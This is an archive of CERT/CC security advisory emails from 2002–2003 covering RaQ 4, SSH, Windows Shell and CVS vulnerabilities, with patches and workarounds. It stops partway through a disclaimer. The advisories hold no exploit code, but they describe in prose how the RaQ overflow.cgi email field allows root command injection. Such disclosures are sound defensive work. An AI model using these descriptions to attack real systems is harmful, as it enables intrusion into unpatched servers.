listing MD5 checksums and official distribution sites for libpcap and tcpdump. CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions http://www.cert.org/advisories/CA-2002-30.html 4. Multiple Vulnerabilities in BIND The CERT/CC has documented multiple vulnerabilities in BIND, the popular domain name server and client library software package from the Internet Software Consortium (ISC). Some of these vulnerabilities may allow a remote intruder to execute arbitrary code with privileges of the the user running named (typically root). Several vulnerabilities are referenced in the advisory; they are listed here individually. CERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND http://www.cert.org/advisories/CA-2002-31.html Vulnerability Note #852283 Cached malformed SIG record buffer overflow http://www.kb.cert.org/vuls/id/852283 Vulnerability Note #229595 Overly large OPT record assertion http://www.kb.cert.org/vuls/id/229595 Vulnerability Note #581682 ISC Bind 8 fails to properly dereference cache SIG RR elements invalid expiry times from the internal database http://www.kb.cert.org/vuls/id/581682 Vulnerability Note #844360 Domain Name System (DNS) stub resolver libraries vulnerable to buffer overflows via network name or address lookups http://www.kb.cert.org/vuls/id/844360 5. Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC) On November 21, 2002 the CERT/CC issued an advisory (CA-2002-33) describing a vulnerability in MDAC, a collection of Microsoft utilities and routines that process requests between databases and network applications. CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC) http://www.cert.org/advisories/CA-2002-33.html ______________________________________________________________________ New CERT/CC PGP Key On September 19, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC. CERT/CC PGP Public Key https://www.cert.org/pgp/cert_pgp_key.asc Sending Sensitive Information To The CERT/CC http://www.cert.org/contact_cert/encryptmail.html ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Congressional Testimony http://www.cert.org/congressional_testimony/ * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Home User Security http://www.cert.org/homeusers/HomeComputerSecurity * Tech Tips http://www.cert.org/tech_tips/ * Training Schedule http:/www.cert.org/training/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2002-04.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2002 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPePMQWjtSoHZUTs5AQGdxwP9HK4mSF15bMQ9MZ4mMFcLIhvdXykANg8A 6nEIAyB8CJpbuWdP7sPh3qAwaZ9BhRFEGeLakONOpoo7bmjkwAWrJHxF3b1CrgHS ZuKQsgEhnm9wpPdU6w6SG1cJBkwz70b8d7YK0vcVuKhmaW0JOx9OLGKsAe3SFePD OiZbNHX+eb8= =Mnbn -----END PGP SIGNATURE----- From - Thu Dec 12 15:24:01 2002 X-UIDL: 2124 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id gBCILpCW029111; Thu, 12 Dec 2002 10:21:52 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id gBCGHFl25817; Thu, 12 Dec 2002 11:17:15 -0500 Date: Thu, 12 Dec 2002 11:17:15 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-35 Vulnerability in RaQ 4 Servers Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 70 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-35 Vulnerability in RaQ 4 Servers Original release date: December 11, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Sun Cobalt RaQ 4 Server Appliances with the Security Hardening Package installed Overview A remotely exploitable vulnerability has been discovered in Sun Cobalt RaQ 4 Server Appliances running Sun's Security Hardening Package (SHP). Exploitation of this vulnerability may allow remote attackers to execute arbitrary code with superuser privileges. I. Description Cobalt RaQ 4 is a Sun Server Appliance. For background information on Cobalt RaQ 4, please see the COBALT RaQ 4 User Manual. Sun provides a Security Hardening Package (SHP) for Cobalt RaQ 4. Although the SHP is not installed by default, many users choose to install it on their RaQ 4 servers. For background information on the SHP, please see the SHP RaQ 4 User Guide. A vulnerability in the SHP may allow a remote attacker to execute arbitrary code on a Cobalt RaQ 4 Server Appliance. The vulnerability occurs in a cgi script that does not properly filter input. Specifically, overflow.cgi does not adequately filter input destined for the email variable. Because of this flaw, an attacker can use a POST request to fill the email variable with arbitrary commands. The attacker can then call overflow.cgi, which will allow the command the attacker filled the email variable with to be executed with superuser privileges. An exploit is publicly available and may be circulating. Further information about this vulnerability may be found in VU#810921 in the CERT/CC Vulnerability Notes Database. II. Impact A remote attacker may be able to execute arbitrary code on a Cobalt RaQ 4 Server Appliance with the SHP installed. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. Workarounds Block access to the Cobalt RaQ 4 administrative httpd server (typically ports 81/TCP and 444/TCP) at your network perimeter. Note that this will not protect vulnerable hosts within your network perimeter. It is important to understand your network configuration and service requirements before deciding what changes are appropriate. Caveats The patch supplied by Sun removes the SHP completely. If your operation requires the use of the SHP, you may need to find a suitable alternative. Appendix A. - Vendor Information Sun Microsystems Sun confirms that a remote root exploit does affect the Sun/Cobalt RaQ4 platform if the SHP (Security Hardening Patch) patch was installed. Sun has released a Sun Alert which describes how to remove the SHP patch: http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/49377 The removal patch is available from: http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg Appendix B. - References 1. CERT/CC Vulnerability Note: VU#810921 - http://www.kb.cert.org/vuls/id/810921 2. Sun SHP RaQ 4 User Guide - http://www.sun.com/hardware/serverappliances/pdfs/support/RaQ_4_SHP_UG.pdf 3. COBALT RaQ 4 User Manual - http://www.sun.com/hardware/serverappliances/pdfs/manuals/manual.raq4.pdf _________________________________________________________________ grazer@digit-labs.org publicly reported this vulnerability. _________________________________________________________________ Author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-35.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History December 11, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPfe3rGjtSoHZUTs5AQGi9gP/YKUB3k9mabWL7w3OYun7zPpsYqtRRFgE zpG77X/wKuHoUjxMArn0thzBeGmpmM0WJ7o3boggArwmgLgm6XQTJyg76JDHKEU5 /ozCZnhd4C39veE08rL1qQgXYIlo56QIANDdCnBchl6Fe/41XYjKblIhlxItRfbM 2bpmCCLvQzk= =5ayh -----END PGP SIGNATURE----- From - Mon Dec 16 15:22:20 2002 X-UIDL: 2195 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id gBGNJ1Pc017056; Mon, 16 Dec 2002 15:19:01 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id gBGJbpV18899; Mon, 16 Dec 2002 14:37:51 -0500 Date: Mon, 16 Dec 2002 14:37:51 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 71 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations Original issue date: December 16, 2002 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Secure shell (SSH) protocol implementations in SSH clients and servers from multiple vendors Overview Multiple vendors' implementations of the secure shell (SSH) transport layer protocol contain vulnerabilities that could allow a remote attacker to execute arbitrary code with the privileges of the SSH process or cause a denial of service. The vulnerabilities affect SSH clients and servers, and they occur before user authentication takes place. I. Description The SSH protocol enables a secure communications channel from a client to a server. From the IETF draft SSH Transport Layer Protocol: The SSH transport layer is a secure low level transport protocol. It provides strong encryption, cryptographic host authentication, and integrity protection.... Key exchange method, public key algorithm, symmetric encryption algorithm, message authentication algorithm, and hash algorithm are all negotiated. Rapid7 has developed a suite (SSHredder) of test cases that examine the connection initialization, key exchange, and negotiation phase (KEX, KEXINIT) of the SSH transport layer protocol. The suite tests the way an SSH transport layer implementation handles invalid or incorrect packet and string lengths, padding and padding length, malformed strings, and invalid algorithms. The test suite has demonstrated a number of vulnerabilities in different vendors' SSH products. These vulnerabilities include buffer overflows, and they occur before any user authentication takes place. SSHredder was primarily designed to test key exchange and other processes that are specific to version 2 of the SSH protocol; however, certain classes of tests are also applicable to version 1. Further information about this set of vulnerabilities may be found in Vulnerability Note VU#389665. Rapid7 has published a detailed advisory (R7-0009) and the SSHredder test suite. Common Vulnerabilities and Exposures (CVE) has assigned the following candidate numbers for several classes of tests performed by SSHredder: * CAN-2002-1357 - incorrect field lengths * CAN-2002-1358 - lists with empty elements or multiple separators * CAN-2002-1359 - "classic" buffer overflows * CAN-2002-1360 - null characters in strings II. Impact The impact will vary for different vulnerabilities and products, but in severe cases, remote attackers could execute arbitrary code with the privileges of the SSH process. Both SSH servers and clients are affected, since both implement the SSH transport layer protocol. On Microsoft Windows systems, SSH servers commonly run with SYSTEM privileges, and on UNIX systems, SSH daemons typically run with root privileges. In the case of SSH clients, any attacker-supplied code would run with the privileges of the user who started the client program, with the possible exception of SSH clients that may be configured with an effective user ID of root (setuid root). Attackers could also crash a vulnerable SSH process, causing a denial of service. III. Solution Apply a patch or upgrade Apply the appropriate patch or upgrade as specified by your vendor. See Appendix A below and the Systems Affected section of VU#389665 for specific information. Restrict access Limit access to SSH servers to trusted hosts and networks using firewalls or other packet-filtering systems. Some SSH servers may have the ability to restrict access based on IP addresses, or similar effects may be achieved by using TCP wrappers or other related technology. SSH clients can reduce the risk of attacks by only connecting to trusted servers by IP address. While these workarounds will not prevent exploitation of these vulnerabilities, they will make attacks somewhat more difficult, in part by limiting the number of potential sources of attacks. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. The Systems Affected section of VU#389665 contains additional vendor status information. Cisco Systems, Inc. The official statement regarding this is that we are not vulnerable. Cray Inc. Cray Inc. supports the OpenSSH product through their Cray Open Software (COS) package. COS 3.3, available the end of December 2002, is not vulnerable. If a site is concerned, they can contact their local Cray representive to obtain an early copy of the OpenSSH contained in COS 3.3. F-Secure F-Secure SSH products are not exploitable via these attacks. While F-Secure SSH versions 3.1.0 build 11 and earlier crash on these malicious packets, we did not find ways to exploit this to gain unauthorized access or to run arbitrary code. Furthermore, the crash occurs in a forked process so the denial of service attacks are not possible. Fujitsu Fujitsu's UXP/V OS is not vulnerable because it does not support SSH. IBM IBM's AIX is not vulnerabible to the issues discussed in CERT Vulnerability Note VU#389665. lsh I've now tried the testsuite with the latest stable release of lsh, lsh-1.4.2. Both the client and the server seem NOT VULNERABLE. NetScreen Technologies Inc. Tested latest versions. Not Vulnerable. OpenSSH From my testing it seems that the current version of OpenSSH (3.5) is not vulnerable to these problems, and some limited testing shows that no version of OpenSSH is vulnerable. Pragma Systems, Inc. December 16, 2002 Rapid 7 and CERT Coordination Center Vulnerability report VU#389665 Pragma Systems Inc. of Austin, Texas, USA, was notified regarding a possible vulnerability with Version 2.0 of Pragma SecureShell. Pragma Systems tested Pragma SecureShell 2.0 and the upcoming new Version 3.0, and found that the attacks did cause a memory access protection fault on Microsoft platforms. After research, Pragma Systems corrected the problem. The correction of the problem leads us to believe that any attack would not cause a Denial of Service, or the ability of random code to run on the server. The problem is corrected in Pragma SecureShell Version 3.0. Any customers with concerns regarding this vulnerability report should contact Pragma Systems, Inc at support@pragmasys.com for information on obtaining an upgrade free of charge. Pragma's web site is located at www.pragmasys.com and the company can be reached at 1-512-219-7270. PuTTY PuTTY 0.53b addresses vulnerabilities discovered by SSHredder. SSH Communications Security SSH Secure Shell products are not exploitable via these attacks. Appendix B. References * CERT/CC Vulnerability Note: VU#389665 - http://www.kb.cert.org/vuls/id/389665 * Rapid 7 Advisory: R7-0009 - http://www.rapid7.com/advisories/R7-0009.txt * Rapid 7 SSHredder test suite - http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666 * IETF Draft: SSH Transport Layer Protocol - http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-15. txt * IETF Draft: SSH Protocol Architecture - http://www.ietf.org/internet-drafts/draft-ietf-secsh-architecture- 13.txt * Privilege Separated OpenSSH - http://www.citi.umich.edu/u/provos/ssh/privsep.html _________________________________________________________________ The CERT Coordination Center thanks Rapid7 for researching and reporting these vulnerabilities. _________________________________________________________________ Author: Art Manion. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-36.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History December 16, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPf4qimjtSoHZUTs5AQEGbAQAiJcA+QFf2mOElaPIFwEmSRC83xlKifq/ PlmaGbUx2UnwTIi8s2ETF8KjlfQjjgO20B4ms1MMaJ/heyxklOgpeBOQ2mpa2Tnd yIY7sxpBuRjF1qS6yQ8/OrcsSqVxdxZWkPLAypV11WcJlMmSxxLdKi5t86EsWic3 xazIo8XEipc= =Nj+0 -----END PGP SIGNATURE----- From - Thu Dec 19 15:02:52 2002 X-UIDL: 2301 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id gBJMjBjN005560; Thu, 19 Dec 2002 14:45:11 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id gBJJCct16973; Thu, 19 Dec 2002 14:12:38 -0500 Date: Thu, 19 Dec 2002 14:12:38 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-37 Buffer Overflow in Microsoft Windows Shell Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 72 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-37 Buffer Overflow in Microsoft Windows Shell Original release date: December 19, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * All versions of Microsoft Windows XP Overview A buffer overflow vulnerability exists in the Microsoft Windows Shell. An attacker can exploit this vulnerability by enticing a victim to read a malicious email message, visit a malicious web page, or browse to a folder containing a malicious .MP3 or .WMA file. The attacker can then execute arbitrary code with the privileges of the victim. I. Description The Microsoft Windows Shell provides the basic human-computer interface for Windows systems. Browsing local and remote folders, running wizards, and performing configuration tasks are examples of operations utilizing the Windows Shell. Microsoft describes the Windows Shell as follows: The Windows Shell is responsible for providing the basic framework of the Windows user interface experience. It is most familiar to users as the Windows Desktop, but also provides a variety of other functions to help define the user's computing session, including organizing files and folders, and providing the means to start applications. A vulnerability exists in the Windows Shell function used to extract attribute information from audio files. This function is invoked automatically when a user browses to a folder containing .MP3 or .WMA files. Further information about this vulnerability can be found in the following documents: Foundstone Research Labs Advisory FS2002-11 Microsoft Security Bulletin MS02-072 CERT/CC Vulnerability Note VU#591890 A CVE candidate (CAN-2002-1327) has been assigned as well. II. Impact An attacker can either execute arbitrary code (which would run with the privileges of the victim) or crash the Windows Shell. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. Note that Microsoft is actively deploying the patch for this vulnerability via Windows Update. Appendix A. - Vendor Information Microsoft Corporation Please see http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-072.asp. Appendix B. - References 1. Foundstone Research Labs Advisory FS2002-11 - http://www.foundstone.com/knowledge/randd-advisories-display.html?id=339 2. Microsoft Security Bulletin MS02-072 - http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-072.asp 3. CERT/CC Vulnerability Note VU#591890 - http://www.kb.cert.org/vuls/id/591890 4. CVE CAN-2002-1327 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1327 _________________________________________________________________ Foundstone Research Labs discovered this vulnerability. _________________________________________________________________ Author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-37.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History December 19, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPgIYTmjtSoHZUTs5AQEgFwQArxDsC+CdyrvADBbR8mEMcxxZKs1Luc2M yORbNtIwPHIvlX+gKMcoftKyO20Dq1MlqxTyAjnXnxbHJKK3bYKcIDZN7x0n5Yx4 VazcyftxU5uRuBe+XIi8v9IimFTfZ2S+XvezRvNjF0usL36dX15LjHff32bp+aC3 DpU8ee4z7g0= =4hoh -----END PGP SIGNATURE----- From - Wed Jan 22 21:59:45 2003 X-UIDL: 2725 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id h0N2n8X3446374; Wed, 22 Jan 2003 18:49:09 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h0MNvoM19085; Wed, 22 Jan 2003 18:57:50 -0500 Date: Wed, 22 Jan 2003 18:57:50 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-02 Double-Free Bug in CVS Server Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 73 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-02 Double-Free Bug in CVS Server Original issue date: January 22, 2003 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running CVS Home project versions of CVS prior to 1.11.5 * Operating system distributions that provide CVS * Source code repositories managed by CVS * For detailed vendor status information, see VU#650937: Overview A "double-free" vulnerability in the Concurrent Versions System (CVS) server could allow an unauthenticated, remote attacker with read-only access to execute arbitrary code, alter program operation, read sensitive information, or cause a denial of service. I. Description CVS is a version control and collaboration system that is widely used by open-source software development projects. CVS is commonly configured to allow public, anonymous, read-only access via the Internet. The CVS server component contains a "double-free" vulnerability that can be triggered by a set of specially crafted directory requests. While processing these requests, an error-checking routine may attempt to free() the same memory reference more than once. Deallocating the already freed memory leads to heap corruption, which an attacker could leverage to execute arbitrary code, alter the logical operation of the CVS server program, or read sensitive information stored in memory. In most cases, heap corruption will result in a segmentation fault, causing a denial of service. The CVS server process is typically started by the Internet services daemon (inetd) and runs with root privileges. Arbitrary code inserted by an attacker would therefore run with root privileges. The CERT/CC is tracking this issue as VU#650937: This reference number corresponds to CVE candidate CAN-2002-0059: This issue was researched and reported by Stefan Esser of e-matters: II. Impact Depending on configuration, operating system, and platform architecture, a remote attacker with anonymous, read-only access to a vulnerable CVS server could execute arbitrary code, alter the operation of the server program, read sensitive information, or cause a denial of service. There is also a significant secondary impact. An attacker who is able to compromise a CVS server could modify source-code repositories to contain Trojan horses, backdoors, or other malicious code. III. Solution Apply a patch or upgrade Apply the appropriate patch or upgrade as specified by your vendor. See Appendix A. below and the Systems Affected section of VU#650937 for further information: Disable or restrict anonymous CVS access As a temporary solution until patches or upgrades can be applied, or to improve the security of CVS servers in the long term, consider the following workarounds and configurations: * Disable anonymous CVS server access completely. * Block or restrict access to CVS servers from untrusted hosts and networks. Anonymous access to CVS servers using :cvspserver: is typically provided on port 2401/tcp. * Configure CVS servers to run in restricted (chroot) environments. * Host CVS servers on single-purpose, secured systems. These workarounds and configurations are not complete solutions and will not prevent exploitation of this vulnerability. Other features inherent in CVS may give anonymous users the ability to gain shell access. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. The Systems Affected section of VU#650937 contains additional vendor status information: Conectiva Conectiva Linux is affected by this issue and updated packages are available at : 6.0/SRPMS/cvs-1.10.8-5U60_3cl.src.rpm 6.0/RPMS/cvs-1.10.8-5U60_3cl.i386.rpm 6.0/RPMS/cvs-doc-1.10.8-5U60_3cl.i386.rpm 7.0/SRPMS/cvs-1.11-7U70_2cl.src.rpm 7.0/RPMS/cvs-1.11-7U70_2cl.i386.rpm 7.0/RPMS/cvs-doc-1.11-7U70_2cl.i386.rpm 8/SRPMS/cvs-1.11-9U80_2cl.i386.rpm 8/RPMS/cvs-1.11-9U80_2cl.i386.rpm 8/RPMS/cvs-doc-1.11-9U80_2cl.i386.rpm An official announcement is pending and will show up in our updates website at shortly. Cray Inc. Cray Inc. supports CVS through their Cray Open Software (COS) package. COS 3.3 and earlier is vulnerable. A new CVS will be available shortly. Please contact your local Cray service representative if you need this new package. CVS Home CVS release 1.11.5 addresses this issue for CVS servers. CVS clients are not affected. Debian Debian has updated their distribution with DSA 233. For the stable distribution (woody) this problem has been fixed in version 1.11.1p1debian-8.1. For the old stable distribution (potato) this problem has been fixed in version 1.10.7-9.2. For the unstable distribution (sid) this problem will be fixed soon. Hewlett-Packard SOURCE: Hewlett-Packard Company and Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company RE: x-reference SSRT3463 Not Vulnerable: HP-UX HP-MPE/ix HP Tru64 UNIX HP NonStop Servers HP OpenVMS To report any security issue for any HP software products send email to IBM The AIX operating system does not ship with CVS. However, CVS is available for installation on AIX from the Linux Affinity Toolbox. CVS versions 1.11.1p1-2 and earlier are vulnerable to the issues discussed in CERT Vulnerability Note VU#650937 and any advisories which follow. Users are advised to download CVS 1.11.1p1-3 from: Please note that the above address was wrapped to two lines. CVS 1.11.1p1-3 contains the security fixes made in CVS 1.11.5 to address these issues. This software is offered on an "as-is" basis. Openwall GNU/*/Linux We don't yet re-distribute CVS in Openwall GNU/*/Linux. We do, however, provide public anonymous CVS access to a copy of our repository, hosted off a separate machine and in a chroot jail. This kind of vulnerabilities in CVS was expected, and our anoncvs setup is mostly resistant to them: read-only access to the repository is achieved primarily with the use of regular Unix permissions, not controls built into CVS. CVS LockDir option is used to direct CVS lock files to a separate directory tree, actually writable to the pseudo-user. Nevertheless, the anoncvs server has been upgraded to CVS 1.11.5 a few hours after it was released. Red Hat, Inc. Red Hat Linux and Red Hat Linux Advanced Server shipped with a cvs package vulnerable to these issues. New cvs packages are now available along with our advisory at the URLs below. Users of the Red Hat Network can update their systems using the 'up2date' tool. Red Hat Linux Advanced Server: Red Hat Linux: Sun Microsystems Inc. Sun does not include CVS with Solaris and therefore Solaris is not affected by this issue. Sun Linux, versions 5.0.3 and below, does ship with a vulnerable CVS package. Sun recommends that CVS services be disabled on affected Sun Linux systems until patches are available for this issue. Sun will be publishing a Sun Alert for Sun Linux describing the patch information which will be available from: Appendix B. References * CERT/CC Vulnerability Note VU#650937 - * e-matters Advisory 01/2003 - _________________________________________________________________ This vulnerability was reported by Stefan Esser of e-matters. _________________________________________________________________ Author: Art Manion. ______________________________________________________________________ This document is available from: ______________________________________________________________________ CERT/CC Contact Information Email: Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site To subscribe to the CERT mailing list for advisories and bulletins, send email to . Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" 